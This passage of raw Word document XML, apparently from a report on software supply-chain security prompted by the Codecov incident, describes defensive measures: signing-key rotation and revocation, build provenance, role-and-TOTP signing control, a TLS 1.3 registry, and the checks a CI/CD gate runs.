                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>), file mode 0600, loaded only by the signing service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Non-exportable HSM/KMS key; IAM-restricted Sign API</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Public-key distribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4422"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Release keys in the root-signed trust policy; root public key pinned out-of-band</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Same; root key fingerprint published in docs / package manager</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Rotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4422"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>rotate()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>: old key becomes retired (valid only for releases signed before retirement), new key becomes active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Scheduled rotation (e.g. yearly)</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Revocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4422"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>revoke()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>: key revoked, private key destroyed, new key issued; all artifacts it signed are rejected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Incident response playbook</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Old-key invalidation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4422"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Retired keys cannot validate releases timestamped after retirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Same</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Version revocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4422"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Revoked-version list and minimum version in the trust policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Same</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Audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4422"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>KEY_GENERATE, KEY_ROTATE, KEY_REVOKE, TRUST_POLICY_PUBLISH, SIGN_RELEASE (including denied attempts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SIEM + transparency log</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sz w:val="24"/>
        </w:rPr>
        <w:t>Why this matters for Codecov:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the leaked credential in the incident could write to storage but could not have produced an Ed25519 signature, because signing requires the signing service (role + MFA + protected key). Even if a release key were stolen, publishing a new trust policy that revokes it invalidates every artifact signed with it within one policy update.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.7 Build Provenance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Provenance (in the style of SLSA [10] and in-toto [13]) records how the artifact was made: source repository, commit ID, source SHA-256, build ID, build timestamp, builder identity, dependencies, security-test results and the artifact hash. It is embedded in the signed manifest, and its own SHA-256 is signed as well. The verifier checks that the provenance describes the same artifact hash and that builder and repository appear in the customer's approved lists. An artifact built on an attacker's machine, or from an unapproved repository, fails with INVALID_PROVENANCE even if other checks pass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.8 Access Control for Signing (RBAC + MFA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Signing is a privileged operation. The signing service accepts a request only if the caller has the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>release-manager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> role </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> supplies a valid TOTP code (RFC 6238 [15], 30-second window, constant-time comparison). Developers can build but cannot sign; auditors can only read logs. Denied attempts are logged as UNAUTHORIZED_SIGNER. This addresses the root cause of the incident: a single leaked machine credential was enough to change a release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.9 Secure Distribution with TLS 1.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The artifact registry is an HTTPS server whose TLS context sets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>minimum_version = TLSv1_3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. A local certificate authority (ECDSA P-256) issues the server certificate for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the customer client trusts only that CA and also refuses anything below TLS 1.3. Tests confirm that TLS 1.3 is negotiated and that a TLS 1.2-only client is refused. They also confirm the key point of the design: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a tampered file served over perfectly valid TLS 1.3 is still blocked by the signature and hash checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.10 CI/CD Security Gate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5832000" cy="1478267"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="pipeline_gate.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="1478267"/>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5.4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Continuous supply-chain security gate (vendor pipeline to customer pipeline)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The gate is the enforcement point. It runs in the customer's pipeline before an artifact is used, and it returns exit code 0 (DEPLOY) or 1 (BLOCK), so it plugs into any CI system. The verification engine always evaluates all ten checks, so the report shows every problem at once. The primary status is the first failing check:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Checks enforced by the security gate</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="453"/>
        <w:gridCol w:w="1927"/>
        <w:gridCol w:w="4536"/>
        <w:gridCol w:w="2041"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="454"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Blocks when</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Status</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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trust policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Not signed by pinned root, expired, or older than one already seen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>INVALID_TRUST_POLICY</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manifest schema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Missing or malformed field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>INVALID_MANIFEST</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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Signer authorised</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>key_id not in the trust policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>UNAUTHORIZED_KEY</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Key status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Key revoked, or retired key used after retirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>REVOKED</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
